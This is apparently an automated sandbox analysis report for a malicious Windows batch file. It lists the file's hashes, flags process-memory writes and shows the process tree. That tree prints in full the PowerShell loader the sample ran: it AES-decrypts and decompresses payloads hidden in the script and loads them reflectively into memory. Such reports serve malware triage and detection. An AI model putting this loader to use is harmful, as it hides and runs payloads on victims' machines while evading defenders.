0a0a6608a80b982fc1f0897b89c9ffa58ba58e3c2d1c200155e47c495b0c6150

Analysis

max time kernel
0s
max time network
121s
platform
windows7_x64
resource
win7-20240419-en
resource tags

arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
submitted
01-07-2024 01:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0a0a6608a80b982fc1f0897b89c9ffa58ba58e3c2d1c200155e47c495b0c6150.cmd
Size

500KB
MD5

6e45850d43bde1d6bc68ab6b07daf153
SHA1

427ed64bb89e6bf40e59276768d37152c209e976
SHA256

0a0a6608a80b982fc1f0897b89c9ffa58ba58e3c2d1c200155e47c495b0c6150
SHA512

e44ea25026d2146991e61eb82ed6028af248fb9235b271f665943b432833e3274a3e9ae9ffc912436b294e6a450337cbd251daafad11c926a41cc942042b4f81
SSDEEP

12288:Co8xbtgA4f9Ek3aoC4QvfD2ZK1n6B4XyZYi9lGUnnQ:Co8NtsaCm1nhqD9ginQ

Score

1^/10

Malware Config

Signatures

Suspicious use of WriteProcessMemory 33 IoCs

Processes:

cmd.exe

description	pid	process	target process
PID 1700 wrote to memory of 108	1700	cmd.exe	cmd.exe
PID 1700 wrote to memory of 108	1700	cmd.exe	cmd.exe
PID 1700 wrote to memory of 108	1700	cmd.exe	cmd.exe
PID 1700 wrote to memory of 1336	1700	cmd.exe	cmd.exe
PID 1700 wrote to memory of 1336	1700	cmd.exe	cmd.exe
PID 1700 wrote to memory of 1336	1700	cmd.exe	cmd.exe
PID 1700 wrote to memory of 2944	1700	cmd.exe	cmd.exe
PID 1700 wrote to memory of 2944	1700	cmd.exe	cmd.exe
PID 1700 wrote to memory of 2944	1700	cmd.exe	cmd.exe
PID 1700 wrote to memory of 1812	1700	cmd.exe	cmd.exe
PID 1700 wrote to memory of 1812	1700	cmd.exe	cmd.exe
PID 1700 wrote to memory of 1812	1700	cmd.exe	cmd.exe
PID 1700 wrote to memory of 2120	1700	cmd.exe	cmd.exe
PID 1700 wrote to memory of 2120	1700	cmd.exe	cmd.exe
PID 1700 wrote to memory of 2120	1700	cmd.exe	cmd.exe
PID 1700 wrote to memory of 2728	1700	cmd.exe	cmd.exe
PID 1700 wrote to memory of 2728	1700	cmd.exe	cmd.exe
PID 1700 wrote to memory of 2728	1700	cmd.exe	cmd.exe
PID 1700 wrote to memory of 2280	1700	cmd.exe	cmd.exe
PID 1700 wrote to memory of 2280	1700	cmd.exe	cmd.exe
PID 1700 wrote to memory of 2280	1700	cmd.exe	cmd.exe
PID 1700 wrote to memory of 2332	1700	cmd.exe	cmd.exe
PID 1700 wrote to memory of 2332	1700	cmd.exe	cmd.exe
PID 1700 wrote to memory of 2332	1700	cmd.exe	cmd.exe
PID 1700 wrote to memory of 2404	1700	cmd.exe	cmd.exe
PID 1700 wrote to memory of 2404	1700	cmd.exe	cmd.exe
PID 1700 wrote to memory of 2404	1700	cmd.exe	cmd.exe
PID 1700 wrote to memory of 2156	1700	cmd.exe	cmd.exe
PID 1700 wrote to memory of 2156	1700	cmd.exe	cmd.exe
PID 1700 wrote to memory of 2156	1700	cmd.exe	cmd.exe
PID 1700 wrote to memory of 2648	1700	cmd.exe	powershell.exe
PID 1700 wrote to memory of 2648	1700	cmd.exe	powershell.exe
PID 1700 wrote to memory of 2648	1700	cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\0a0a6608a80b982fc1f0897b89c9ffa58ba58e3c2d1c200155e47c495b0c6150.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:1700

C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
2⤵
PID:108

C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
2⤵
PID:1336

C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
2⤵
PID:2944

C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
2⤵
PID:1812

C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
2⤵
PID:2120

C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
2⤵
PID:2728

C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
2⤵
PID:2280

C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
2⤵
PID:2332

C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
2⤵
PID:2404

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo cls;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('wNcFKur0Jl7450HdnpBnzjJ0VkczGUUgZCayB4N/z5k='); $aes_var.IV=[System.Convert]::FromBase64String('LnVH8Q3dknv++SzltewTug=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZpTQS=New-Object System.IO.MemoryStream(,$param_var); $OYGBL=New-Object System.IO.MemoryStream; $STZRP=New-Object System.IO.Compression.GZipStream($ZpTQS, [IO.Compression.CompressionMode]::Decompress); $STZRP.CopyTo($OYGBL); $STZRP.Dispose(); $ZpTQS.Dispose(); $OYGBL.Dispose(); $OYGBL.ToArray();}function execute_function($param_var,$param2_var){ $QnAOk=[System.Reflection.Assembly]::Load([byte[]]$param_var); $GDXEp=$QnAOk.EntryPoint; $GDXEp.Invoke($null, $param2_var);}$pPyzM = 'C:\Users\Admin\AppData\Local\Temp\0a0a6608a80b982fc1f0897b89c9ffa58ba58e3c2d1c200155e47c495b0c6150.cmd';$host.UI.RawUI.WindowTitle = $pPyzM;$CtNBM=[System.IO.File]::ReadAllText($pPyzM).Split([Environment]::NewLine);foreach ($oZZUg in $CtNBM) { if ($oZZUg.StartsWith('IrzEsjacAQqOMrEShQQm')) { $GKlON=$oZZUg.Substring(20); break; }}$payloads_var=[string[]]$GKlON.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
2⤵
PID:2156

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
2⤵
PID:2648

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2648-4-0x00000000022A0000-0x0000000002320000-memory.dmp

Filesize
512KB

Download
memory/2648-5-0x000000001B540000-0x000000001B822000-memory.dmp

Filesize
2.9MB

Download
memory/2648-6-0x0000000002240000-0x0000000002248000-memory.dmp

Filesize
32KB

Download
memory/2648-7-0x00000000022A0000-0x0000000002320000-memory.dmp

Filesize
512KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads